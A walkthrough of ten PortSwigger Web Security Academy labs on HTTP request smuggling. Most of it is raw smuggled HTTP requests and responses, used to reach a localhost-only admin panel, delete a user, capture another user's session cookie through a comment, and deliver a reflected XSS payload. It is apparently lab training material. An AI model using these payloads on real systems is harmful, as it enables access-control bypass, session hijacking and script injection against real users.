HTTP Request Smuggling
What is HTTP Request Smuggling?
HTTP Request Smuggling is a vulnerability that allows the order of requests to a web application to be changed. An attacker exploiting this vulnerability can bypass security mechanisms such as WAF and gain access to sensitive data.
Logic Of Operation
A second HTTP request is written in the body of a POST request to the target application. Since the second request is in the body of the first request, security systems such as WAF do not recognize it as an attack and therefore do not block it. The web application parses the incoming request and treats it as 2 different requests. There are multiple techniques (CL-TE, TE-CL etc.) used to exploit this vulnerability.
PortSwigger Web Academy Examples
1. HTTP request smuggling, basic CL.TE vulnerability
To exploit the HTTP Request Smuggling vulnerability hosted by this web application, we first replay a request made to the home page of the application in our BurpSuite tool.
GET / HTTP/1.1
Host: ac3e1f701e637e778012e6e6007500c5.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac3e1f701e637e778012e6e6007500c5.web-security-academy.net/post/comment/confirmation?postId=2
Connection: close
Cookie: session=QroHeEwCKAozHYTLXrEWz40PF4vTC9eU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
After receiving our request to the main page, we need to edit this request to be POST method and “Chunked”.
POST / HTTP/1.1
Host: ac3e1f701e637e778012e6e6007500c5.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac3e1f701e637e778012e6e6007500c5.web-security-academy.net/post/comment/confirmation?postId=2
Connection: close
Cookie: session=QroHeEwCKAozHYTLXrEWz40PF4vTC9eU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Transfer-Encoding: chunked
0
G
After editing the request in this way, we send it to the target server, after receiving the response to the request we sent, we make another request from the browser and the application tells us that the “GPOST” method is not recognized. This response shows us that the vulnerability related to the arrangement we made can be exploited.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 33
“Unrecognized method GPOST”
2. HTTP request smuggling, basic TE.CL vulnerability
To exploit the HTTP Request Smuggling vulnerability hosted by this web application, we first replay a request made to the home page of the application in our BurpSuite tool.
GET / HTTP/1.1
Host: aca91f811e7be3cb8078376000d5005a.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net
Connection: close
Referer: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net/post?postId=2
Cookie: session=NUJOItmchuwSnGGmesoLylI5MXrQRGTh
Upgrade-Insecure-Requests: 1
Once we receive the request, we modify it to exploit the vulnerability of the target system.
POST / HTTP/1.1
Host: aca91f811e7be3cb8078376000d5005a.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Origin: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net
Connection: close
Referer: https://aca91f811e7be3cb8078376000d5005a.web-security-academy.net/post?postId=2
Cookie: session=NUJOItmchuwSnGGmesoLylI5MXrQRGTh
Upgrade-Insecure-Requests: 1
Transfer-Encoding: Chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After editing the request in this way, we send it to the target server, after receiving the response to the request we sent, we make another request from the browser and the application tells us that the “GPOST” method is not recognized. This response shows us that the vulnerability related to the arrangement we made can be exploited.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 33
“Unrecognized method GPOST”
3. HTTP request smuggling, obfuscating the TE header
As we did in the previous examples, in this example, we take a request made to the home page and modify it as follows.
POST / HTTP/1.1
Host: acde1f6c1e950b2b81a6d79c00720095.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
Connection: close
Cookie: session=L3RViYphCl3EbNVNvMjzGmPfoD1ifAp7
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
Transfer-Encoding: chunked
Transfer-Encoding: enf
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
We send the modified request to the target server and after receiving the response, we make another request through the browser or Repeater and examine the server’s response.
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Keep-Alive: timeout=0
Content-Length: 27
“Unrecognized method GPOST”
By editing the HTTP request, we have exploited the vulnerability hosted by the target server.
4. HTTP request smuggling, confirming a CL.TE vulnerability via differential responses
In this example, we are asked to get a 404 response from the target server using the HTTP Request smuggling vulnerability. After receiving the request to the main page of the target web application in the Repeater tab, we edit and send it as follows.
POST / HTTP/1.1
Host: acbe1ffb1e81eecc80db22d5009500a0.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses
Connection: keep-alive
Cookie: session=5ap6p1xgeuGNoLZCycK0vq63F9INfij6
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Transfer-Encoding: chunked
0
GET /deneme HTTP/1.1
X-Ignore: X
After the target server responds to the request we made, we make a request again through the browser or Repeater and we see that the target server gives us a 404 response. This response shows us that the vulnerability related to the arrangement we made can be exploited.
HTTP/1.1 404 Not Found
Content-Type: application/json; charset=utf-8
Keep-Alive: timeout=0
Connection: close
Content-Length: 11
“Not Found”
5. HTTP request smuggling, confirming a TE.CL vulnerability via differential responses
In this example, as in the previous example, we are asked to get a 404 response from the target server using the HTTP Request smuggling vulnerability. After receiving the request to the main page of the target web application in the Repeater tab, we edit and send it as follows.
POST / HTTP/1.1
Host: ac901f291eefaabc80bc381500a2003f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://ac901f291eefaabc80bc381500a2003f.web-security-academy.net/post?postId=5
Connection: keep-alive
Cookie: session=ElYbHK7HbpNx2b950onRnFjdrHAtBlK9
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After the target server responds to the request we made, we make a request again through the browser or Repeater and we see that the target server gives us a 404 response. This response shows us that the vulnerability related to the arrangement we made can be exploited.
HTTP/1.1 404 Not Found
Content-Type: application/json; charset=utf-8
Keep-Alive: timeout=0
Connection: close
Content-Length: 11
“Not Found”
6. Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability
In this example, we are asked to access the restricted path “/admin” on the target server and delete the user “Carlos”. The “/admin” address can only be accessed if the requests to the relevant address come from localhost. As we did in our previous examples, let’s make a request to the main page of the application and edit this request.
POST / HTTP/1.1
Host: ac6e1f421e14946b80423a5100040063.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
Connection: close
Cookie: session=h44DdwM9xiAVPXpagtdwkzLB10uF3f88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
Let’s send the edited request to the target server and analyze the response.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=hWNPTKeHssnAkXwa9OpGcT1Avtbo1oku; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2920
<!DOCTYPE html>
<html>
…
<section class=”top-links”>
<a href=”/login”>Account login</a><p>|</p>
<a href=”/admin”>Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator — </span>
<a href=”/admin/delete?username=administrator”>Delete</a>
</div>
<div>
<span>carlos — </span>
<a href=”/admin/delete?username=carlos”>Delete</a>
</div>
<div>
<span>wiener — </span>
<a href=”/admin/delete?username=wiener”>Delete</a>
</div>
</section>
…
</html>
When we examine the answer, we see that we access the admin panel on the target application. Now let’s edit our request again and delete the user “Carlos”.
POST / HTTP/1.1
Host: ac6e1f421e14946b80423a5100040063.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te
Connection: close
Cookie: session=h44DdwM9xiAVPXpagtdwkzLB10uF3f88
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
x=
Let’s send the edited request to the target server and analyze the response.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=rERq7HRNGdDcqLlC7h8Rex52DXIrzXZS; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
We see that the target server redirects us back to the admin panel, to make sure that this response means that the target system has completed the process, we make a request to the main page of the application and we see that our example is solved.
…
<span>LAB</span>
<p>Solved</p>
<span class=”lab-status-icon”></span>
</div>
</div>
</section>
<section id=”notification-labsolved” class=”notification-labsolved-hidden”>
<div class=”container”>
<h4>Congratulations, you solved the lab!</h4>
<div>
…
7. Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
In this example, we are asked to do the same as the previous example, but since we will use the TE-CL attack type, the changes we will make to the HTTP request will be different. Let’s take our home page request to Repeater and make our edits.
POST / HTTP/1.1
Host: ac9e1ff41e6eada480b84e4b0010008f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl
Connection: keep-alive
Cookie: session=AzVQGCT6z5guaraBzDFSfuDuNEpHFH8x
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
We send our edited request to the target server and examine the response from the server.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=l0Jh8b3STFLvNAADu3c2Agm0roc0uuOp; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2920
<!DOCTYPE html>
<html>
…
<section class=”top-links”>
<a href=”/login”>Account login</a><p>|</p>
<a href=”/admin”>Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator — </span>
<a href=”/admin/delete?username=administrator”>Delete</a>
</div>
<div>
<span>carlos — </span>
<a href=”/admin/delete?username=carlos”>Delete</a>
</div>
<div>
<span>wiener — </span>
<a href=”/admin/delete?username=wiener”>Delete</a>
</div>
</section>
…
</html>
As we can see in the HTTP response from the server, we have access to the admin panel. Now let’s edit our request again and delete the relevant user.
POST / HTTP/1.1
Host: ac9e1ff41e6eada480b84e4b0010008f.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-te-cl
Connection: keep-alive
Cookie: session=AzVQGCT6z5guaraBzDFSfuDuNEpHFH8x
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
After sending the edited request to the server, let’s examine the HTTP response that the server gives us.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=tULgK1910cLLaxtepLGdHBV5m2BMNT7P; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
As in the previous example, the server redirected us back to the admin panel. To make sure that this response means that the server has completed the process, we make a request to the main page of the application and see that our example is resolved.
…
<span>LAB</span>
<p>Solved</p>
<span class=”lab-status-icon”></span>
</div>
</div>
</section>
<section id=”notification-labsolved” class=”notification-labsolved-hidden”>
<div class=”container”>
<h4>Congratulations, you solved the lab!</h4>
<div>
…
8. Exploiting HTTP request smuggling to reveal front-end request rewriting
In this example, we are asked to do the same thing as the previous two examples, but instead of the “Host” header that allows us to access the admin panel in the HTTP request, we will use a different header information. Let’s make a request with the search function on the home page and put our request in Repeater to make our edits.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
search=test
Let’s send the edited request to the target server and analyze the response.
…
<section class=”blog-header”>
<h1>0 search results for ‘test
POST / HTTP/1.1
X-yOldbL-Ip: 31.140.186.119
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/2'</h1>
<hr>
</section>
…
When we examine the HTTP response that the server gives us, we see the HTTP request headers and the X-yOldbL-Ip: header. Using this header, we will be able to access the admin panel on the target system. Let’s edit our HTTP request to use the “X-yOldbL-Ip:” header information.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 148
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
X-yOldbL-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
x=1
Let’s send our edited request to the server and verify that we can access the admin panel.
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Set-Cookie: session=ycEzvjDQ6ErWl6ZIefqKXcV52WMJiBBj; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 2881
<!DOCTYPE html>
<html>
…
<section class=”top-links”>
<a href=”/login”>Account login</a><p>|</p>
<a href=”/admin”>Admin panel</a><p>|</p>
</section>
</header>
<section>
<h1>Users</h1>
<div>
<span>administrator — </span>
<a href=”/admin/delete?username=administrator”>Delete</a>
</div>
<div>
<span>carlos — </span>
<a href=”/admin/delete?username=carlos”>Delete</a>
</div>
<div>
<span>wiener — </span>
<a href=”/admin/delete?username=wiener”>Delete</a>
</div>
</section>
…
</html>
Now that we have access to the admin panel, we can delete the user “Carlos”. Let’s edit our request again for this process.
POST / HTTP/1.1
Host: acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Origin: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net
Connection: close
Referer: https://acb01ffc1f788d3d80d440c2008d009e.web-security-academy.net/
Cookie: session=B6FJ4MUlNcOi2sqBm2MGDmewPk8sWkFp
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
0
GET /admin/delete?username=carlos HTTP/1.1
X-yOldbL-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Connection: close
x=1
Let’s send our edited request to the target server and analyze the response.
HTTP/1.1 302 Found
Location: /admin
Set-Cookie: session=GG99CB8ubsDVVaEpExzeHDC0qqSv59dj; Secure; HttpOnly
Keep-Alive: timeout=0
Connection: close
Content-Length: 0
In this example, as in the previous examples, the server redirected us back to the admin panel. To make sure that this response means that the server has completed the process, we make a request to the main page of the application and see that our example is resolved.
…
<span>LAB</span>
<p>Solved</p>
<span class=”lab-status-icon”></span>
</div>
</div>
</section>
<section id=”notification-labsolved” class=”notification-labsolved-hidden”>
<div class=”container”>
<h4>Congratulations, you solved the lab!</h4>
<div>
…
9. Exploiting HTTP request smuggling to capture other users’ requests
In this example, we are asked to capture the “session” value of another user in the system and log in to the target user account. In order to perform this exploit, we need to store the target user’s request somewhere in the application. We will use the commenting function for this. As we did in the previous examples, we receive and edit the request.
POST / HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 264
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 670
Cookie: session=Zp4vHahBtBjcmVrWsHcEnW4VqHHlfST4
csrf=k3VpZNW1DpTwO3Xa7wLSB7narTBqXpUp&postId=5&name=test&email=deneme%40deneme.com&website=&comment=test
After preparing our request, we send it to the target system and refresh the comments screen of the relevant post through the browser. We need to repeat this process until we catch the target user’s request.
…
<section class=”comment”>
<p>
<img src=”/resources/images/avatarDefault.svg” class=”avatar”>test | 23 March 2020
</p>
<p>test
GET / HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate, br
Cookie: victim-fingerprint=ZUB3keIiSE4cr1nwniqepKTEAWSDNYFy; secret=1Uo5bUqU7PwWSdBQlCjHwL67kedsSJtb; session=LbbOKtuQQHXpdvKINvUnv7MYu4vSJ78l
</p>
<p></p>
</section>
…
As seen above, we have captured the HTTP request of the target user as a comment. Let’s log in to the target system using the session value of the user.
POST /login HTTP/1.1
Host: acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://acfa1f1e1f92ebbd8024372000b000c1.web-security-academy.net
Connection: close
Cookie: session=LbbOKtuQQHXpdvKINvUnv7MYu4vSJ78l
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
csrf=k3VpZNW1DpTwO3Xa7wLSB7narTBqXpUp&username=carlos&password=123456
After sending our request, we see that our example is solved.
…
<span>LAB</span>
<p>Solved</p>
<span class=”lab-status-icon”></span>
</div>
</div>
</section>
<section id=”notification-labsolved” class=”notification-labsolved-hidden”>
<div class=”container”>
<h4>Congratulations, you solved the lab!</h4>
<div>
…
10. Exploiting HTTP request smuggling to deliver reflected XSS
In this example, we are asked to trigger the HTTP request smuggling vulnerability and the XSS vulnerability in the “User-Agent” header. As we did in the previous examples, we take our HTTP request and edit it to exploit the relevant vulnerabilities.
POST / HTTP/1.1
Host: acac1fde1f99942080380adb00430028.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Transfer-Encoding: chunked
0
GET /post?postId=1 HTTP/1.1
User-Agent: a”/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
x=1
We send the edited request to the target server and after receiving the response, we make a request through the browser. When we make a request through the browser, we get an alert box. In this way, we have triggered XSS vulnerability with HTTP request smuggling vulnerability.
…
<span>LAB</span>
<p>Solved</p>
<span class=”lab-status-icon”></span>
</div>
</div>
</section>
<section id=”notification-labsolved” class=”notification-labsolved-hidden”>
<div class=”container”>
<h4>Congratulations, you solved the lab!</h4>
<div>
…
